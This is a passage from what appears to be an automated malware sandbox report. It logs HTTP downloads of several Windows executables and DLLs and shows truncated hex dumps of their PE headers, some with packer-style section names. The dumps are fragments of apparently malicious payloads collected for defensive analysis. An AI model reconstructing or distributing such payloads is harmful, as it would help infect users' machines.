65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 21 Dec 2024 21:17:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 21:17:53 GMTContent-Type: application/octet-streamContent-Length: 439296Last-Modified: Sat, 21 Dec 2024 08:14:10 GMTConnection: keep-aliveETag: "676678d2-6b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 01 33 64 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 27 a0 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 45 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 c0 45 00 00 e0 e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 05 00 18 00 00 00 18 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 3c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a f1 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 48 01 00 00 10 05 00 00 4a 01 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c0 45 00 00 00 e0 06 00 00 46 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 21 Dec 2024 21:17:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 21 Dec 2024 21:17:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 21:18:00 GMTContent-Type: application/octet-streamContent-Length: 605696Last-Modified: Thu, 12 Dec 2024 15:01:10 GMTConnection: keep-aliveETag: "675afab6-93e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 08 00 b4 00 00 00 00 60 09 00 48 04 00 00 00 10 09 00 74 4c 00 00 00 00 00 00 00 00 00 00 00 70 09 00 90 0b 00 00 80 04 08 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 06 08 00 28 00 00 00 40 03 08 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 07 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e ec 06 00 00 10 00 00 00 ee 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 ce 01 00 00 00 07 00 00 d0 01 00 00 f2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 3b 00 00 00 d0 08 00 00 1c 00 00 00 c2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 74 4c 00 00 00 10 09 00 00 4e 00 00 00 de 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 48 04 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 90 0b 00 00 00 70 09 00 00 0c 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 21:18:05 GMTContent-Type: application/octet-streamContent-Length: 3272704Last-Modified: Sat, 21 Dec 2024 21:06:30 GMTConnection: keep-aliveETag: "67672dd6-31f000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 f0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 32 00 00 04 00 00 bc b0 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 df 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 de 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d4 05 00 00 00 90 06 00 00 06 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 63 6f 70 72 6c 6e 73 00 30 2b 00 00 b0 06 00 00 30 2b 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 72 7a 72 6d 62 62 72 00 10 00 00 00 e0 31 00 00 06 00 00 00 c8 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 31 00 00 22 00 00 00 ce 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 21:18:07 GMTContent-Type: application/octet-streamContent-Length: 4534272Last-Modified: Sat, 21 Dec 2024 21:12:07 GMTConnection: keep-aliveETag: "67672f27-453000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c6 e7 66 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 d4 4e 00 00 c6 74 00 00 32 00 00 00 40 c9 00 00 10 00 00 00 f0 4e 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 70 c9 00 00 04 00 00 48 4b 45 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 10 72 00 73 00 00 00 00 00 72 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 20 c9 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 20 c9 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 71 00 00 10 00 00 00 a0 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 00 72 00 00 02 00 00 00 b0 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 72 00 00 02 00 00 00 b2 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 3a 00 00 20 72 00 00 02 00 00 00 b4 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 67 6e 6c 72 72 74 78 00 60 1c 00 00 d0 ac 00 00 54 1c 00 00 b6 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 67 65 69 68 69 6f 69 00 10 00 00 00 30 c9 00 00 04 00 00 00 0a 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 c9 00 00 22 00 00 00 0e 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 